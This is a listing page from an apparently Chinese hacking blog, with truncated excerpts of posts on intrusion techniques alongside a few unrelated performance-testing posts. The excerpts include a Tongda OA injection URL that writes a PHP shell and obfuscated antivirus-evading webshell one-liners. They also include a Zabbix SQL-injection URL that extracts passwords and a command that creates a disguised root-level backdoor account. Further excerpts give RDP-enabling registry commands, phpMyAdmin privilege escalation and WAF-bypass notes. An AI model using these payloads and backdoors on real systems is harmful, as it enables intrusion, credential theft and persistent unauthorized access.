- 博客(32)
- 资源 (22)
- 收藏
- 关注
RSS订阅转载 如何将mdf导入到SQL Server 2008
进入Sql Server Management Studio在“对象资源管理器”右击“数据库”单击附加进入“附加数据库”后添加mdf文件即可。还可以使用系统存储过程EXEC sp_attach_db @dbname='yourdatabasename', --添加一个数据库@dbname=数据库的名字@filename1='盘符:\文件夹\xxx.MDF', -
2014-11-05 16:00:37
638
转载 各种奇葩3389连接不上的解决方法
整理一下各种3389连接不上的解决方法。1、最经常出现的3389端口没开。怎么看端口开没开呢。最简单的办法是netstat -an 查看是不是有127.0.0.1:3389有这行。如果有表示开已经开放了 木有的话就表示木有开放3389终端端口(PS:这样看的前提是管理员没有很贱的修改掉终端端口。)第二种查看是基于命令行的。我很喜欢这种方式。reg query "
2014-10-20 22:57:23
14320
1
转载 注销远程桌面用户方法
C:\>query userUSERNAME SESSIONNAME ID STATE IDLE TIME LOGON TIME>dfsadmin 0 Disc . 7/23/2007 7:53 PMmrsa
2014-07-24 11:39:43
2400
转载 通达OA 2011-2013 通杀
EXP: 第一步: [GET]http://site/general/crm/studio/modules/EntityRelease/release.php?entity_name=1%d5'%20or%20sys_function.FUNC_ID=1%23%20${%20fputs(fopen(base64_decode(c2hlbGwucGhw),w),base6
2014-04-22 13:46:37
832
转载 免杀一句话2
ASP系列 (密码是-7) PHP系列 @$_="s"."s"./*-/*-*/"e"./*-/*-*/"r"; @$_=/*-/*-*/"a"./*-/*-*/$_./*-/*-*/"t"; @$_/*-/*-*/(
2014-04-18 01:49:33
899
转载 免杀一句话
0x01:ASP一句话1.2. 3. 0x02:免杀大部分网站的一句话4.0x03:免杀部分网站过略的一句话5.executerequest("x")0x04:免杀部分网站过略双引号的一句话6.0x05:php一句话7.0x06:aspx一句话8. WebAdmin2Y.x.y aaaaa = newWebAdmin2Y.x.y("x");
2014-04-18 01:48:21
2338
转载 dos下一句话开启3389
dos下一句话开启3389,不用重启,测试过XP和2003.....dos下一句话开启3389,不用重启,测试过XP和2003.....开启3389REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f查看远程终端REG
2014-04-17 15:47:15
1221
转载 SQLMAP自带的绕过脚本 --tamper
首先这个文章我是转来的 http://www.chuhades.com/post/19590b_4cc51f 确实很实用,就当记录一下吧,方便日后查询。 apostrophemask.py UTF-8编码 Example: * Input: AND '1'='1' * Output: AND %EF%BC%871%EF%BC%87=%EF%BC%871%EF%BC%87
2014-01-17 13:35:29
2513
转载 Sqlserver列出所有数据库名,表名,字段名
Sqlserver列出所有数据库名,表名,字段名 1.获取所有数据库名: ?1SELECT Name FROM Master..SysDatabasesORDER BYName 注意: 表Master与SysDatabases之间有两个点 2.获取所有表名:
2013-12-18 14:19:46
561
转载 ewebeditor改版
ewebeditor改版,eWebwanEditorbo 默认帐号密码:adwanminbo/editorwaneboweb
2013-10-22 23:11:54
510
原创 zabbix破解用户,密码
http://zabbix.server/zabbix/httpmon.php?applications=2%20and%20%28select%201%20from%20%28select%20count%28*%29,concat%28%28select%28select%20concat%28cast%28concat%28alias,0x7e,passwd,0x7e%29%20as%20c
2013-10-18 16:22:35
1902
原创 UCenter表字段
1:uc_membersuid,username,password,email,myid,myidkey,regip,regdate,lastloginip,lastlogintime,salt2:uc_admins uid,username,allowadminsetting,allowadminapp,allowadminuser,allowadminbadword,all
2013-10-16 14:45:46
637
转载 突破安全狗的一些记录
1、绕过IIS安全狗的一句话。前几天测试一个网站。找到突破口之后,写入webshell,但服务器上装有IIS安全狗,平时常用的一句话或者shell都用不了。下面这段.net一句话可以突破。连接端用cncert的aspx一句话客户端。2、IIS6.0解析漏洞遇到安全狗。文件名为http://www.2cto.com /1.asp;1.jpg。这样的会被IIS安全狗
2013-10-15 00:45:38
938
原创 sqlmap---post----注入
sqlmap---post----注入先抓包http://zzzzz.com/xx/xx_list.asp?action=listbm=%C6%BD%C3%E6%B2=sss&xx=sss------------------------------------------------------------------------------------------
2013-10-14 13:39:25
1303
转载 Tomcat漏洞利用
Tomcat是Apache软件基金会的一个免费的、开放源码的WEB应用服务器,可以运行在Linux和Windows等多个平台上,由于其性能稳定、扩展性好、免费等特点深受广大用户的喜爱。目前,互联网上绝大多数JAVA WEB应用都运行在Tomcat服务器上。Tomcat作为Web应用的载体,一旦出现安全问题,那么运行在其上的Web应用的安全也无法得到保障,所以研究Tomcat的漏洞与安全性就
2013-10-13 15:50:29
3555
1
转载 常见web中间件拿shell
作者:Pax.Mac Team核心成员1.weblogic后台页面:http://127.0.0.1:7001/console(http为7001,https为7002)Google关键字:WebLogic Server Administration Console inurl:console默认的用户名密码1、用户名密码均为:weblogic2、用
2013-10-13 15:40:38
1085
转载 文件上传攻防解析
文件上传是WEB应用很常见的一种功能,本身是一项正常的业务需求,不存在什么问题。但如果在上传时没有对文件进行正确处理,则很可能会发生安全问题。本文将对文件上传的检测方式以及如何绕过相应检测方式进行详细的分析,并提供针了对文件上传攻击的安全防护方法。文件上传攻击是指攻击者利用WEB应用对上传文件过滤不严,导致可以上传应用程序定义类型范围之外的文件到Web服务器。比如可以上传一个网页木马,如果
2013-10-13 11:20:29
1418
转载 phpmyadmin的提权
一:暴路径:libraries/lect_lang.lib.phpthemes/darkblue_orange/layout.inc.php二:提权选择一个Database.运行以下语句.----start code---Create TABLE a (cmd text NOT NULL);Insert INTO a (cmd) VALUES('''');sel
2013-10-13 10:51:20
845
转载 dedecms爆后台文件技巧
1.include/dialog/select_soft.php文件可以爆出DEDECMS的后台,以前的老板本可以跳过登陆验证直接访问,无需管理 员帐号,新版本的就直接转向了后台.2.include/dialog/config.php会爆出后台管理路径3.include/dialog/select_soft.php?activepath=/include/FCKeditor
2013-10-12 14:30:27
1708
转载 JBOSS远程代码执行漏洞
JBOSS默认配置会有一个后台漏洞,漏洞发生在jboss.deployment命名空间中的addURL()函数,该函数可以远程下载一个war压缩包并解压访问http://www.safe3.com.cn:8080/jmx-console/ 后台,如下图下拉找到如下图所示点击flavor=URL,type=DeploymentScanner进入
2013-10-12 13:56:41
1065
转载 linux一条命令添加一个root级别账户并设置密码
内网机器提权添加账户,无回显,设置密码就不好弄,下面就是添加一个root级别的账户并设置密码的命令 useradd -p `openssl passwd -1 -salt 'lsof' admin` -u 0 -o -g root -G root -s /bin/bash -d /usr/bin/lsof lsof命令解释useradd 添加用户-p `open
2013-10-12 13:35:21
1029
转载 intitle,inurl,filetype,site的作用以及在google中的用法
说起Google,可谓无人不知无人不晓。作为世界第一的搜索引擎,其强大的搜索功能,可以让你在瞬间找到你想要的一切。不过对于普通的计算机用户而言,Google是一个强大的搜索引擎;而对于黑客而言,则可能是一款绝佳的黑客工具。正因为google的检索能力强大,黑客可以构造特殊的关键字,使用Google搜索互联网上的相关隐私信息。通过Google,黑客甚至可以在几秒种内黑掉一个网站。这种利用Google
2013-10-12 11:00:26
2834
转载 【转】详解:利用PHPCMS V9漏洞入侵网站取得webshell权限
考虑到本文涉及到的v9漏洞已公布很长时间,并且官方早已给出补丁,对绝大部分站点影响已经很小,湛蓝特将此方法发布与大家分享学习,此方法可取得目标站点webshell权限,上传任意木马控制站点。湛蓝天空声明:本方法具有很强针对攻击性,目的是让大家了解黑客利用开源系统PHPCMS V9漏洞入侵网站,取得webshell权限并添加持久锚链接的一般流程。请勿对任何漏洞站点进行测试
2013-10-12 10:23:37
7072
转载 转:性能测试过程中的网络带宽及流量监视讨论
1. 概述在性能测试过程中,随着B/S结构网络应用的越来流行,界面元素的不断丰富、系统并发用户量的不断增加,在性能测试过程中,对网络带宽的消耗越来越大。在测试中,如何以前得测试环境下的实际网络带宽情况;如何保证测试过程中不因为网络带宽造成系统的瓶颈从而影响性能测试结果的准确性,如何确认现有的网络传输设备在大负载下能够稳定的进行网络数据的传输与交换……在现在,已经成了性能测试中必须要考虑的一个
2009-07-27 11:02:00
1954
转载 转:软件性能
什么是软件性能首先澄清的第一个概念是什么是软件性能,作者分别从用户视角,管理员视角和开发人员的视角列出下面的问题,这些就是所谓的软件性能。你有过其中的疑问就是在考虑软件性能的范畴了,寻求解决方案的过程及其结论(report)就是软件性能测试1. 用户所体会到的系统响应时间是否够快?2. 应用服务器的资源使用情况是否合理?3. 数据库服务器的资源使用情况是否合理?
2009-07-27 10:53:00
355
转载 转:性能测试中带宽的影响
这两天在为进行过调优后的服务器做性能测试,在对其中一个详情页面进行压力测试的时候,测试结果为110TPS,对于这一结果我们是非常不满意,随后又在多个不同的模块下进行测试,结果都非常的相近,然而在压力测试过程当中,服务器的资源消耗非常低,由此我们可以看出,服务器远远未达到压力的极限,而应用程序应该不会有问题,如果是程序问题,服务器资源绝对不会有那么多空闲。 问题到底出在哪里呢?我们web服务器的架构
2009-07-26 23:06:00
406
转载 转:IE内存泄漏
Web开发的发展 在过去一些的时候,Web开发人员并没有太多的去关注内存泄露问题。那时的页面间联系大都比较简单,并主要使用不同的连接地址在同一个站点中导航,这样的设计方式是非常有利于浏览器释放资源的。即使Web页面运行中真的出现了资源泄漏,那它的影响也是非常有限而且常常是不会被人在意的。 今天人们对Web应用有了高更的要求。一个页面很可能数小时不会发生URL跳转,并同时通过Web服
2009-07-26 20:19:00
245
阿里云公共云基础服务平台-等保2.0大礼包-20200228.rar
2020-07-29
GitHack-master.rar
2019-07-20
DirBuster-0.12-Setup.rar
2019-07-20
实践大师:UNIX sed和awk编程篇
2011-03-09
正则表达式必知必会(中文版)
2011-03-09
硬件防火墙选购十要素
2009-06-26
cfosspeed网络提速软件
2008-09-11
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人